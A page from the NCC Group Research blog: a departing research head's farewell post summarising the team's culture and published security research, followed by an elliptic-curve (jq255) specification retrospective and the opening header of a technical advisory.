There are new articles available, click to refresh the page.
Before yesterdayNCC Group Research

So long and thanks for all the 0day

23 November 2022 at 19:52

After nearly four years into my role, I am stepping down as NCC Group’s SVP & Global Head of Research. In part just for myself, to reflect on a whirlwind few years, and in part as a thank you and celebration of all of the incredible researchers with whom I have had the privilege of working, I’m writing this post to share:

I am proud of what we have accomplished together. First of all, we survived a global pandemic and somehow managed to publish any security research at all, despite how profoundly this affected so many of us. And it amazes me to say that in fact, across a team of several hundred technical security consultants globally, we’ve published over 600 research publications (research papers, technical blog posts, technical advisories/CVEs, conference talks, and open-source tool releases) since 2019, including releasing well over 60 open-source security tools, and presenting around 150 conference presentations at venues including Black Hat USA, Shmoocon, ACM CCS, Hardwear.io, REcon, IEEE Security & Privacy, Appsec USA, Toorcon, Oracle Code One, BSidesLV, O’Reilly Artificial Intelligence, Chaos Communication Congress, Microsoft BlueHat, HITB Amsterdam, RSA Conference, Ekoparty, CanSecWest, the Linux Foundation Member Summit, DEF CON, and countless others. We won awards, served on advisory boards, hacked drones out of the sky, served on Review Boards of top venues including USENIX WOOT and Black Hat USA, and our research has been covered by media outlets around the world, including Wired, Forbes, The New York Times, Bloomberg, Ars Technica, Politico, DarkReading, Techcrunch, Fast Company, the Wall Street Journal, VICE, and hundreds of other mainstream and trade publications globally.

More importantly, we have: 

  • Watched many researchers graduate from their time at NCC Group to do ever more amazing things, some of whom found their calling through performing their very first research projects within our research program
  • Patched countless vulnerabilities through collaboration with vendors, and sometimes from just writing the patches ourselves
  • Demonstrated the commercial viability of highly specialized security consulting practices driven forward ever further through an intense investment in R&D
  • Advocated and educated for a better (more secure, equitable, privacy-respecting) world through demonstrating the risks and defining the mitigations to critical problems in security & privacy, working with journalists including our numerous collaborations with Which?, and through related policy work like educating US Congressional staffers and testifying before UK Parliament
  • Supported countless researchers to get their first CVEs, publish their first blog posts, overcome fears, get onstage for the first time at Black Hat, and otherwise face the great unknown standing between themselves and their dreams

And I hope that it has been tremendously worthwhile.

Part 1: On leading a security research team

At NCC Group, our approach to security research has been and will continue to be, I think, somewhat unique within our industry. We do not have a small team of full-time researchers we invest in and put on display as evidence of the firm’s broader capability – rather, all of our researchers are seconded to research part-time from their consulting or internal development roles. We are all peers, where people doing their first-ever security research project have equal access to research time and other investment as do established, world-class researchers.

We deliberately resist the trope of the “brilliant asshole,” knowing full well that rockstar-ism and disrespect destroy the type of culture which enables the kind of intellectual risk-taking that security research requires. (Besides – the most talented people I’ve met in my career tend to also be the most humble and kind). 

From my experiences over the past four years, here are a few other things I believe to be true: 

  • Confidence is a skill. A lot of talent is lost to the world for want of a little courage, and sometimes a single comment or experience can change someone’s career forever. As leaders, the greatest gift we can give the people we manage is the skill of confidence – that is, the unshakable belief in someone that they can handle whatever challenges lay before them, and that they are in a safe enough environment that they know where to turn if they find themselves overwhelmed. 
  • We all have an inner critic, but our inner critic is usually wrong. One of my most meaningful memories from my time in this role was at Black Hat/DEF CON/BSidesLV in 2019, where we had over 20 speakers from NCC Group presenting their research. Over half of those researchers confessed to me at some moment leading up to their talks, their feelings of self-doubt, insecurity, or fear. I was grateful to be that person for them, but heartbroken to hear so many talented people question the worth of their work, and sometimes even of themselves. Those speakers universally went on to give excellent talks that were well-received. The lessons here, I think, are both that (1) even the experienced speakers you admire at the best venues in the industry still have moments of imposter syndrome, and thus that, (2) our inner critic tends to be wrong and we should do our best to feel the fear and do things anyway.
  • We are better together. Nothing helps us workshop new ideas and dare to try difficult things like having a trusted community who can share their expertise, give a different perspective, and mentor each other to help us grow. 
  • Elitist gatekeeping holds us all back. There are a number of things our industry needs to stop doing, and most of them are “gatekeeping.” Stop preventing interdisciplinary research and hackily attempting to reinvent other fields. Stop forgetting to give credit to those who did something before you, especially when those people aren’t yet well-known in our industry and it’s easiest to diminish their contributions. Stop making people feel more ashamed to ask a question than to pretend they know something they do not. Stop scaring away new contributors for not having achieved RCE before they started kindergarten. Stop blaming users for not being infosec professionals. Which brings me to my next point….. 
  • Infosec is more meritocratic for some than others. While most of our industry is awesome, there are still people who assume their female peers or leaders are junior, non-technical, or from the Marketing department (which is also a gendered disservice to men in the Marketing department!). Underrepresented people continue to face a disproportionate amount of condescension and exclusion which in turn can make them less likely to submit their talks to CFPs, contribute to OSS, publish their research, or apply for jobs. This barrage of discouragement meaningfully affects individuals, and can even lead to their departure from our industry. Even if CVE allocation and tier-1 conference talk acceptances are agnostic to things like race and gender, the systemic and cultural obstacles edging underrepresented people out of our industry one unwelcoming conversation at a time are not. This needs to be acknowledged if we hope to change it. 
  • Radical inclusivity breeds technical prowess. People do not take intellectual risks (or even ask questions) in environments in which they do not feel psychologically safe. By creating a deliberate culture of warmth, respect, and inclusion of all skill levels and backgrounds, we can take technical and intellectual risks together, view constructive feedback from others as a gift, experiment without necessarily coupling “failure” with “shame,” and accomplish things we’d otherwise dare not try.
  • Bold attempts should be rewarded. At NCC Group, we pay bonuses for achievement in research. For the last few years, we have had several different categories for “achievement,” and you only need to satisfy one of them to qualify for an award. One of the categories under which someone can qualify for one of these bonuses is, “Difficulty, Audacity, and Effort.” We know that trying something difficult is a risk with huge potential upside, but the downside is that it may fail. We have tried to help “own” that risk with our researchers by rewarding valiant efforts to do hard things, even when those things crash and burn. And I think, we’ve been better for it. 

Part 2: A few of my favourite projects (2018-2022)

In the last few years we’ve published well over 600 research talks, blogs, papers, tools and advisories. You can read about every single thing we published in 2020 and 2021 in our corresponding Annual Research Reports. Some of the earlier work has through no fault of our own unfortunately been lost to the sands of time.  

Here, I’ll just share a few (okay, more than a few) of my very favourite things from my time at NCC Group by a number of talented consultants and researchers, past and present. Admittedly, there have been a lot of great projects and this is at best a pseudorandom sample of fond memories. Most of the things below are research projects, but some of them are interesting initiatives we’ve worked on inside or outside NCC Group, not to mention our many publicly-reported security audits of critical software and hardware, and the creation and rapid growth of our Commercial Research division.

  • Assessing Unikernel Security (Spencer Michaels & Jeff Dileo, 2019) 
    The “Infinite Jest” of unikernel security whitepapers, this 104-page monstrosity performed a necessary security deep-dive into unikernels – single-address-space machine images constructed by treating component applications and drivers like libraries and compiling them, along with a kernel and a thin OS layer, into a single binary blob. It challenged the idea that unikernels’ smaller codebases and lack of excess services necessarily imply security, demonstrating through study of the major unikernels Rumprun and IncludeOS that instead, everything old was new again, with now-canonical features like ASLR, W^X, stack canaries, heap integrity checks and more are either completely absent or seriously flawed. The authors furthermore reasoned that if an application running on such a system contains a memory corruption vulnerability, it is often possible for attackers to gain code execution, even in cases where the application’s source and binary are unknown, and worse yet noting that because the application and the kernel run together as a single process, an attacker who compromises a unikernel can immediately exploit functionality that would require privilege escalation on a regular OS, e.g. arbitrary packet I/O.

  • The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations (David Wong & external collaborators Eyal Ronen, Robert Gillham, Daniel Genkin, Adi Shamir, & Yuval Yarom, IEEE S&P 2019)
    This phenomenal paper showed that in the 20 years of earnest attempts at patching Bleichenbacher-style padding oracle attacks against RSA implementations of the PKCS #1 v1.5 standard, many are still vulnerable to leakage from novel microarchitectural side channels. In particular, they describe and demonstrate Cache-like ATtacks (CATs), enabling downgrade attacks against any TLS connection to a vulnerable server and recovering all the 2048 bits of the RSA plaintext, breaking the security of 7-out-of-9 popular implementations of TLS. 

  • Practical Attacks on Machine Learning Systems (Chris Anley, 2022)
    This wide-ranging paper by NCC Group’s Chief Scientist, Chris Anley, discusses real-world attack classes possible on machine learning systems. In it, he reminds us that “models are code,” demonstrating vulnerabilities and attacks related to Python Pickle Files, PyTorch’s PT format and State Dictionary formats, a Keras H2 Lambda Layer Exploit, Tensorflow, and Apache MXNet, and to name a few. He also reproduces a number of existing results from the machine learning attack literature, and presents a taxonomy of attacks on machine learning systems including malicious models, data poisoning, adversarial perturbation, training data extraction, model stealing, “masterprints,” inference by covariance, DoS, and model repurposing. Critically, he reminds us that in addition to all of these novel attack types that are specific to AI/ML, traditional hacking techniques still work on these systems also – discussing the problems of credentials in code, dependency risks, and webapp vulnerabilities like SQL injection – of course, an evergreen topic for Chris 🙂

  • Sinking U-Boots with Depthcharge (Jon Szymaniak, Hardwear.io 2020)
    An extensible Python 3 toolkit designed to aid security researchers when analyzing a customized, product-specific build of the U-Boot bootloader. And on the topic of U-boot, let us not forget Nicolas Guigo & Nicolas Bidron’s high & critical U-boot vulnerabilities published in 2022.

  • Unpacking .pkgs: A look inside MacOS installer packages (Andy Grant, DEF CON 27)
    In this work, Andy studied the inner workings of MacOS installer packages and demonstrated where serious security issues can arise, including his findings of a number of novel vulnerabilities and how they can be exploited to elevate privileges and gain code/command execution.

  • ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again (Jeff Dileo, 2020)
    In this work, Jeff discusses a vulnerability he found in containerd – a container runtime underpinning Docker and common Kubernetes configurations – which resulted in full root container escape for a common container configuration. The technical advisory and proof-of-concept can be found here.

  • Co-founding the Open Source Security Foundation (Jennifer Fernick, 2020-present)
    In February 2020, a small group of us across the industry founded the Open Source Security Coalition, with the goal of bringing people from across our industry together to improve the security of the open source ecosystem in a collaborative way, enabling impact-prioritized investment of time and funding toward the most critical and impactful efforts to help secure OSS. In August 2020, this became OpenSSF and moved into its more well-resourced home within the Linux Foundation. Since then, we’ve advised Congressional staffers about supply chain security, which supported the greater work of OpenSSF at the White House Open Source Security Summit. Together with David Wheeler, I also had the privilege of presenting a 2021 Linux Foundation Member Summit Keynote on Securing Open Source Software, which can be viewed here, as well as a talk aimed at security researchers at BHUSA with Christopher Robinson. In May 2022, on the heels of the second OSS Security Summit in DC, we announced the Open Source Software Security Mobilization plan, a $150-million dollar 10-point plan to radically improve the security of open-source software. In this, I wrote both a proposal for Conducting Third-Party Code Reviews (& Remediation) of up to 200 of the Most-Critical OSS Components (Stream 7, pages 38-40) with Amir Montazery of OSTIF, as well as a proposal for a vendor-neutral Open Source Security Incident Response Team (now called OSS-SIRT, in Stream 5, pages 30-33) which is now being led by the inimitable CRob of Intel.

  • There’s A Hole In Your SoC: Glitching The MediaTek BootROM (Jeremy Boone & Ilya Zhuravlev, 2020)
    In this work, Jeremy & Ilya (who was, incredibly, an intern at the time) uncovered an unpatchable vulnerability in the MediaTek MT8163V system-on-a-chip (64-bit ARM Cortex-A), and were able to reliably glitch it to bypass signature verification of the preloader, circumventing all secure boot functionality thus completely breaking the hardware root of trust. What’s worse is they have reason to believe these affects other MediaTek chipsets due to a shared BootROM-to-preloader execution flow across them, likely implying that this vulnerability affects a wide variety of embedded devices such as tablets, smart phones, home networking products, and a range of IoT devices.

  • There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities (Ilya Zhuravlev, 2022)
    In this follow-up to Ilya’s previous work, he studied the security of the UNISOC platform’s boot chain, uncovering several unpatchable vulnerabilities in the BootROM which could persistently undermine secure boot. These vulnerabilities could even, for example, be exploited by malicious software which previously escalated its privileges in order to insert a persistent undetectable backdoor into the boot chain. These chips are used across many budget Android phones including some of the recent models produced by Samsung, Motorola and Nokia.

  • On Linux Random Number Generation (Thomas Pornin, 2019)
    Wherein Thomas made an unforgettable case for why monitoring entropy levels on Linux systems is not very useful.

  • Our research partnership with University College London
    Every year, as a part of our research partnership with UCL’s Centre for Doctoral Training in Data-Intensive Science, we work with a small group of high energy physics and astrophysics PhD students to apply machine learning to a domain-specific problem in cybersecurity. For example, in 2020, we explored deepfake capabilities and mitigation strategies. In 2021, we sought to understand the efficacy of various machine learning primitives for static malware analysis. In 2022, we challenged the students to study the effectiveness of using Generative Adversarial Networks (GANs) to improve fuzzing through preprocessing and other techniques (research paper forthcoming).

  • That time the Exploit Development Group successfully exploited the Lexmark MC3224i printer with a file write bug, as well as gaining code execution on the Western Digital PR4100 NAS at Pwn2own (Aaron Adams, Cedric Halbronn, & Alex Plaskett, 2021)

  • 10 real-world stories of how we’ve compromised CI/CD pipelines (Aaron Haymore, Iain Smart, Viktor Gazdag, Divya Natesan, & Jennifer Fernick, 2022)
    We’ve long believed that “CI/CD pipelines are execution engines.” In the past 5 years, we’ve demonstrated countless supply chain attacks in production CI/CD pipelines for virtually every company we’ve tested, with several dozen successful compromises of targets ranging from small businesses to Fortune 500 companies across almost every market and industry. In this blog post we shared 10 diverse examples of ways we’ve compromised development pipelines in real-world engagements with NCC Group clients, with hopes to illuminate the criticality of securing CI/CD pipelines amid our industry’s broader focus on supply-chain security. This blog post was expanded into a talk for BHUSA 2022, “RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise

  • Sleight of ARM: Demystifying Intel Houdini (Brian Hong, BHUSA 2021)
    In this work, Brian reverse engineered Intel’s proprietary Houdini binary translator which runs ARM binaries on x86, demonstrating security weaknesses it introduces into processes using it, showing the capability to do things like execute arbitrary ARM and x86, and write targeted malware that bypasses existing platform analysis for platforms used by hundreds of millions.

  • Why you should fear your mundane office equipment (Daniel Romero & Mario Rivas, DEF CON 27)
    With 35 novel vulnerabilities across 6 major printer manufacturers, this research demonstrated the risks that oft-overlooked networked devices can introduce into enterprises, making a case for how they present significant potential for exploitation and compromise by threat actors seeking to gain a persistent foothold on target organisations. Later work in 2022 by Alex Plaskett and Cedric Halbronn demonstrated remote over the network exploitation of a Lexmark printer and persistence across both firmware updates and reboots.

  • Finally releasing the long-awaited whitepaper for TriforceAFL (Tim Newsham & Jesse Hertz, 2017)
    Better late than never! Six years ago, Tim Newsham and Jesse Hertz released TriforceAFL – an extension of the American Fuzzy Lop (AFL) fuzzer which supports full-system fuzzing using QEMU – but unfortunately the associated whitepaper for this work was never published. We did some archaeology around NCC and were happy to be able to release the associated paper a few months ago.

  • MacOS vulns including CVE-2020-9817 (Andy Grant, 2019-2020) 
    Andy found both privesc bug in the macOS installer enabling arbitrary code execution with root privileges, effectively leading to a full system compromise. He also disclosed CVE-2020-3882, a bug in macOS enabling an attacker to retrieve semi-arbitrary files from a target victim’s macOS system using only a calendar invite, giving me an excellent excuse to never take a call again (or like, until patching) from my friend Andy Grant 🙂

  • Solitude: A privacy analysis tool (Dan Hastings & Emanuel Flores, Chaos Communication Congress 2020)
    After showing at DEF CON in 2019 that many mobile apps’ privacy policies are lying to us about the data they collect, Dan Hastings was worried about how users who are not themselves security researchers could better understand the privacy risks of the mobile apps. Solitude was created with those users in mind – specifically, this open source privacy analysis tool was created to empower users to conduct their own privacy investigations into where their private data goes once it leaves their web browser or mobile device, and is broadly extensible and configurable to study a wide range of data types across arbitrary mobile applications. This work was also presented to key end-user communities such as activists, journalists, and others at the human rights conference, RightsCon.

  • On the malicious use of large language models like GPT-3 (Jennifer Fernick, 2021)
    This blogpost explored the theoretical question of whether (and how) large language models like GPT-3 or their successors may be useful for exploit generation, and proposed an offensive security research agenda for large language models, based on a converging mix of existing experimental findings about privacy, learned examples, security, multimodal abstraction, and generativity (of novel output, including code) by large language models including GPT-3.

  • Critical vulnerabilities in a prominent OSS cryptography libraries (Paul Bottinnelli, 2021)
    Paul uncovered critical vulnerabilities enabling arbitrary signature forgery of ECDSA signatures in several open-source cryptography libraries – one with over 7.3M downloads in the previous 90 days on PyPI, and over 16,000 weekly downloads on npm.

  • Command and KubeCTL: Real-World Kubernetes Security for Pentesters (Mark Manning, Shmoocon 2020) 
    In this talk and corresponding blog post, Mark explored Kubernetes offensive security across a spectrum of security postures and environments, demonstrating flaws and risks in each – those without regard to security, those with incomplete threat models, and seemingly well-secured clusters. This was a part of a larger body of work by Mark that made significant contributions to the security of k8s.

  • Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes (Cedric Halbronn, 2021)
    Leveraging the Windows Sandbox, Cedric created a Qubes-like containerization for Microsoft Windows, enabling you to spawn applications in isolation. This means that if you browse a malicious site using Wubes, it won’t be able to infect your Windows host without additional chained exploits. Specifically, this means attackers need 1, 2, 3 and 4 below instead of just 1 and 2 in the case of Firefox:

    1) Browser remote code execution (RCE) exploit
    2) Local privilege exploit (LPE)
    3) Bypass of Code Integrity (CI)
    4) HyperV (HV) elevation of privilege (EoP)

  • Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities (Aleksandar Kircanski & Terence Tarvis, 2020)
    This paper sought to offer an overview of the various classes of implementation-level security flaws that commonly arise in proof-of-work blockchains, studying the vulnerabilities found during the first decade of Bitcoin’s existence, with the dual-purpose of both offering a roadmap for security testers performing blockchain security reviews, as well as a reference for blockchain developers on common pitfalls. It enumerated 10 classes of blockchain-specific software flaws, introducing several novel bug classes alongside known examples in production blockchains.

  • Rich Warren’s vulnerabilities in Pulse Connect Secure and Sonicwall (2020-2021)
    Rich Warren and David Cash initially published multiple vulnerabilities in Pulse Connect Secure VPN appliances including an arbitrary file read vulnerability (CVE-2020-8255), an injection vulnerability which can be exploited by an authenticated administrative user to execute arbitrary code as root (CVE-2020-8243), and an uncontrolled gzip extraction vulnerability to overwrite arbitrary files, resulting in RCE as root (CVE-2020-8260). Rich later found that this patch could be bypassed, resulting yet again in RCE (CVE-2021-22937). He later published a series of 6 advisories related to the SonicWall SMA 100 Series, yet again demonstrating systemic vulnerabilities in highly privileged network appliances. This seems to be a theme in our industry, and is highly concerning given major supply chain attack events on similar highly-privileged and ubiquitous network appliances in recent years. I believe it is essential that we continue to dig deeper into the security limitations of these types of devices.

  • F5 Networks Big IP threat intelligence (Research & Intelligence Fusion Team, July 2020)
    In this work, NCC Group’s RIFT team (led by folks including Ollie Whitehouse & Christo Butcher) published initial analysis of active exploitation NCC had observed of the CVSS 10.0, F5 Networks TMUI RCE vulnerability (CVE-2020-5902) allowing arbitrary, active interception of any traffic traversing an internet-exposed, unpatched Big-IP node, initially being used by threat actors to execute code, and later being involving staged exploitation, web shells, and were able to bypass mitigation attempts, including gaining creds, privkeys, TLS certificates to load balancers and more. Here is the Wired piece initially discussing this threat intel.

  • Breaking a class of binary obfuscation technologies (Nicolas Guigo, 2021)
    In this work Nico revealed tools and methods for reversing real-world binary obfuscation, effectively breaking one of the canonical mobile app obfuscation tools and demonstrating that the protections offered by obfuscation tools are probably orders-of-magnitude fewer person-hours for attackers to break than our industry tends to assume. (Bonus points to Nico for sending me his epic initial demo for this set to Eric Prydz’ “Opus”)

  • Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s TrustZone (Keegan Ryan, ACM CCS 2019)
    This paper showed the susceptibility of TrustZone to sidechannel attacks allowing an attacker to gain insight into the microarchitectural behaviour of trusted code. Specifically, it demonstrated a series of novel vulnerabilities that leak sensitive cryptographic information through shared microarchitectural structures in Qualcomm’s implementation of Android’s hardware-backed keystore, allowing an attacker to extract sensitive information and fully recover a 256-bit ECDSA private key.

  • Popping Locks, Stealing Cars, and Breaking a Billion Other Things: Bluetooth LE Link Layer Relay Attacks (Sultan Qasim Khan, Hardwear.io NL 2022)
    The mainstream headline for this was something like, “we hacked a Tesla and drove away,” but the real headline was that Sultan created the long-hypothesized but yet-unproven world’s first link-layer relay attack on Bluetooth Low Energy, due to the nature of the attack itself even bypassing most existing relay attack mitigations. This story was originally published by Bloomberg but ended up covered by over 900 media outlets worldwide. The advisories for Tesla and BLE are here. This work reminds us that the use of technologies/protocols/standards for security purposes for which they were not designed can be dangerous. 
Video source: Dan Goodin of Ars Technica
  • Hacking in Space (2022-2023)
    Okay, so, this is just a teaser for future work. Keep an eye on this, umm, space 🚀

Conclusion & greets

It feels so strange to say goodbye – we haven’t even released “Symphony of Shellcode” yet 😮  

I’m forever grateful to Dave Goldsmith, Nick Rowe, and Ollie Whitehouse for taking a chance on me and allowing me the unreal opportunity to lead such an esteemed technical team, and for the friendship and contributions of them and of many other technical leaders (past* and present) across NCC Group – not least, NCC Group’s Commercial Research Director and former UK/EU/APAC Research Director Matt Lewis, as well as Jeff Dileo, Jeremy Boone, Will Groesbeck, Kevin Dunn, Ian Robertson, Damian Archer*, Rob Wood, Javed Samuel, Chris Anley, Nick Dunn, Robert Seacord*, Richard Appleby, Timur Duehr, Daniel Romero, Iain Smart, Clint Gibler*, Spencer Michaels*, Drew Suarez*, Joel St John*, Ray Lai*, and Bob Wessen* – as well as our program coordinators Aaron Haymore* and R. Rivera, and the dozens (real talk: hundreds) of talented consultants with whom I’ve had the tremendous privilege of working. Thank you for justifying simultaneously both my deep existential fear that everything is hackable, and my hope that there are so many bright, ethically-minded people using all of their power to make things safer and more secure for us all.

And now, onto the next dream <3

A jq255 Elliptic Curve Specification, and a Retrospective

21 November 2022 at 16:38

First things first: there is now a specification for the jq255e and jq255s elliptic curves; it is published on the C2SP initiative and is formally in (draft) version 0.0.1: https://github.com/C2SP/C2SP/blob/main/jq255.md

The jq255e and jq255s groups are prime-order groups appropriate for building cryptographic protocols, and based on elliptic curves. These curves are from the large class of double-odd curves and their specific representation and formulas are described in particular in a paper I wrote this summer: https://eprint.iacr.org/2022/1052. In a nutshell, their advantages, compared to other curves of similar security levels, are the following:

  • They have prime order; there is no cofactor to deal with, unlike plain twisted Edwards curves such as Curve25519. They offer the same convenience for protocol building as other prime order groups such as ristretto255.
  • Performance is good; cost of operations on curve points is similar to that of twisted Edwards curves, or even somewhat faster. This is true on both large systems (servers, laptops, smartphones) and small and constrained hardware (microcontrollers). On top of that, jq255e (specifically) gets a performance boost for some operations (multiplication of a point by a full-width scalar) thanks to its internal endomorphism.
  • Signatures are short; digital signatures have size only 48 bytes instead of the usual 64 bytes of Ed25519 signatures, or ECDSA over P-256 or secp256k1. This is not a new method, but only the application of a technique that has been known since the late 1980s, but was overlooked for some unclear reasons. The reduction in size also makes verification faster, which is a nice side effect.
  • Implementation is simple; the formulas are straightforward and complete, and the point decompression only requires a square root computation in a finite field, without needing the combined square-root-and-inversion used in ristretto255.

The point of having a specification (as opposed to a research paper) is to provide a practical and unambiguous reference that carefully delineates potential pitfalls, and properly defines the exact encoding rules so that interoperability is achieved. Famously, Curve25519 was not specified in that way, and implementations tried to copy each other, though with some subtle differences that still plague the whole ecosystem. By writing a specification that defines and enforces canonical encodings everywhere, along with a reference implementation (in Python), I am trying to avoid that kind of suboptimal outcome. In jq255 curves, any public key, private key or signature value has a single valid representation as a fixed-size sequence of bytes, and all decoding operations duly reject any input that does not follow such a representation.

The specification is currently a “draft” (i.e. its version starts with “0”). It is meant to gather comments. As per the concept of C2SP, the specification is published as a GitHub repository, so that comments and modifications can be proposed by anybody, using the tools of software development (issues, pull requests, versioning…). It is my hope that these curves gain some traction and help avoid some problems that I still encounter regularly in practical uses of elliptic curve cryptography (in particular related to the non-trivial cofactor of twisted Edwards curves).


This specification is the occasion, for me, to look back at the research I made in the area of elliptic curve cryptography over the past few years. The output of that research can be summarized by the list of corresponding papers, all of which having been pushed to the Cryptology ePrint Archive:

The following trends can be detected:

  • All these papers are about elliptic curves as “generic groups” for which the discrete logarithm problem is believed hard. I did not pursue research (or, more accurately, I found nothing worth publishing) in the area of pairing-friendly elliptic curves, which are special curves with extra properties that enable very nifty functionalities (notably BLS signatures).
  • I always try to achieve a practical benefit in applications, such as making things run faster, or use shorter encodings, with some emphasis on small software embedded systems (i.e. microcontrollers using a small 32-bit CPU such as the ARM Cortex M0+). Small embedded systems tend to be a lot more constrained in resources, and sensitive to optimizations in size and speed, than large servers where CPU power is plentiful and the cost of cryptography in an application is mostly negligible. All papers include links to corresponding open-source implementations that illustrate the application of the described techniques.
  • Whenever possible, I try to explore interoperable solutions; the inertia of already deployed systems is a tremendous force that cannot be dismissed offhandedly, and it is worth investigating ways to apply possible optimizations in the implementation of existing protocols such as EdDSA or ECDSA signatures, even if better solutions could be designed (such as jq255 curves and their signatures).

The first paper in the list above defines a prime-order elliptic curve called Curve9767. The main idea is to use a field extension. Elliptic curves are defined over a (finite) field, where all computations are performed. Usually, we work over the field of integers modulo a given big prime, and we choose the prime such that computations in that field are efficient (for instance, Curve25519 uses the prime 2255-19). In all generality, finite fields have order pm for some prime p (the “field characteristic”) and integer m ≥ 1 (the “extension degree”); for a given total field size (at least 2250 or so, if we want to claim “128-bit security”), the two ends of the spectrum are m = 1 (the field has order p, this is the case of Curve25519 or P-256) and p = 2 (the field has order 2m, as is used in some standard NIST curves such as K-233; more on that later on). Situations “in between”, with a small-ish p but still quite greater than 2, are not well explored, and have some potential security issues that must be carefully avoided (e.g. degree m should not admit a too small prime divisor). Curve9767 uses a field which is, precisely, such an intermediate case, with p = 9767 and m = 19. This field happens to be a sweet optimization spot on, specifically, the ARM Cortex M0+ CPU, yielding good performance, in particular for computing divisions in the field. However, implementations on other architectures (including a slightly larger ARM Cortex M4 microcontroller) yielded only disappointing performance. The experience gathered in that research was not lost; I could reuse it for ecGFp5, whose field uses p = 264-232+1 and m = 5; this is a specialized curve meant for virtual machines with zero-knowledge proofs (e.g. the Miden VM).

Double-odd elliptic curves are a category of curves that had been somewhat neglected previously. Most “classic” research on elliptic curves focused on curves with a prime order, since a prime-order group is what is needed to build cryptographic functionalities such as key exchange (with Diffie-Hellman). When a curve order is equal to rh, for some prime r and an integer h > 1 (h is then called the “cofactor”), protocols built on the curve must take some extra care to avoid issues with the cofactor. Not all protocols were careful enough in practice. Montgomery curves, later reinterpreted as twisted Edwards curves, have a non-trivial cofactor (h is always a multiple of 4 for such curves). Sometimes, the cofactor’s deleterious effects can be absorbed at relatively low cost at the protocol level, but this always requires some extra analysis. Twisted Edwards curves, in particular, offer very good performance with simple and complete formulas (no special case to handle, and this is a very good thing, especially for avoiding side-channel attacks on implementations), but their simplicity is obtained at the cost of pushing some complexity into the protocol. Twisted Edwards curves with cofactor h = 4 or 8 can be turned into convenient prime-order groups, thereby voiding the cofactor issues, through the Decaf/Ristretto construction; this is how the ristretto255 group is defined, over the twisted Edwards Curve25519. With double-odd curves, I explored an “intermediate” case of curves with cofactor h = 2, over which a prime-order group can be built with similar techniques. I recently reinterpreted such curves as a sub-case of an equation type known as the Jacobi quartic, and that finally yielded a prime-order group with all the security and convenience that can be achieved with ristretto255, albeit with somewhat simpler formulas (especially for decoding and encoding points) and slightly better performance. That result was worth describing as a practical specification so that it may be deployed in applications, hence the jq255 document and reference implementation with which I started this present blog post.

Another way to handle cofactor issues is through a validation step, to detect and reject points which are not in the proper prime-order subgroup. This can be done at the cost of a multiplication by the subgroup order (denoted r above), which is simple enough to implement, but expensive. In the case of curves with cofactor 4 or 8, a faster technique is possible, which halves that cost. This paper was meant mostly in the context of FROST signatures, where such validation is made mandatory (for the Ed25519 cipher suite). Even so, this is still expensive, and real prime-order groups such as ristretto255 (or, of course, the jq255 curves) are preferable.

Some of my elliptic curve research was yet one level higher, i.e. in the protocols, and specifically in the handling of signatures. The core principle of signatures on prime order groups was described by Schnorr in the late 1980s; for unfortunate patent-related reasons, a rather clunky derived construction known as DSA was standardized by NIST, and adapted to elliptic curves under the name ECDSA. In 2012, EdDSA signatures were defined, using the original Schnorr scheme, applied to twisted Edwards curves; when the curve is Curve25519 (a reinterpretation, with a change of variables, of a Montgomery curve defined in 2006), the result is called Ed25519. The verification of an ECDSA or EdDSA signature is relatively expensive; an optimization technique for this step, by Antipa et al, was known since 2005, but it relied on a preparatory step which was complicated to implement and whose cost tended to cancel the gains from the optimization technique. That preparatory step could be described as a case of lattice basis reduction in dimension two, with an algorithm from Lagrange, dating back to the 18th century (the roots of cryptographic science are deep). In 2020, I described a much faster, binary version of Lagrange’s algorithm, allowing non-negligible gains in the performance of signature verification, even for fast curves such as Curve25519.

ECDSA signatures, on a standard curve with 128-bit security (e.g. NIST’s P-256, or the secp256k1 curve used in many blockchain systems), have size 64 bytes (in practice, many ECDSA signatures use an inefficient ASN.1-based encoding which makes them needlessly larger than that). Ed25519 signatures also have size 64 bytes. The signature size can be a problem, especially for protocols dealing with small embedded systems, with strict constraints on communication bandwidth. A few bits can be removed from a signature by having the verifier “guess” their value (through exhaustive search), though this increases the verification cost; this can be done for any signature scheme, but in the case of ECDSA and EdDSA, leveraging the mathematical structure of the signatures allows somewhat larger gains, to the extent that it can be practical to reduce EdDSA signatures down to 60 bytes or so. This is a very slight gain, but in some situations it can be a lifesaver. Importantly, this technique, just like the speed optimization described previously, works on plain standard signatures and does not require modifying the signature generator in any way; these are examples of “interoperable solutions”.

Last but not least, I could apply some of the ideas of double-odd curves to the case of binary curves. These are curves defined over finite fields of cardinal 2m for some integer m. To put it in simple words, these fields are weird. Addition in these fields is XOR, so that addition and subtraction are the same thing. In such a field, 1 + 1 = 0 (because 2 = 0). Squaring and square roots are linear operations; every value is a square and has a single square root. Nothing works as it does in other fields; elliptic curves must use their own specific equation format and formulas. Nevertheless, standard curves were, quite early, defined on binary fields, mostly because they are amenable to very fast hardware implementations. Among the fifteen standard NIST curves, ten are binary curves (the B-* and K-* curves, whereas the five P-* curves use integers modulo a big prime p). In more modern times, binary curves are mostly neglected, for a variety of non-completely scientific reasons, one of them being that multiplications in binary fields are quite expensive on small microcontrollers; however, such curves may be very fast on recent CPUs, and are certainly unbroken so far. Using techniques inspired by my previous work on double-odd curves (and many hours of frantic covering of hundreds of sheets of paper with scrawled calculations), I could find formulas for computing over such curves with two advantages over the previously known best formulas: they are complete (no special case for the neutral point, or for adding a point to itself), and they are faster (generic point addition in 8 field multiplications instead of 11). Applying these formulas to the standard curve K-233, I could get computations of point multiplications by a scalar under 30k cycles on a recent x86 CPU, more than twice faster than even the endomorphism-powered jq255e.

A synthetic conclusion of all this is that the question of what is the “best” curve for cryptography is certainly not resolved yet. I could produce a number of optimizations in various places, and my best attempt at general-purpose, fast-everywhere curves are jq255e and jq255s, which is why I am now specifying them so that they may be applied in practical deployments in an orderly way. But some improvements are most probably still lurking somewhere within the equations, and I encourage researchers to have another look at that space.

Technical Advisory – NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)

17 November 2022 at 16:00
Vendor: NXP Semiconductors
Vendor URL: https://www.nxp.com
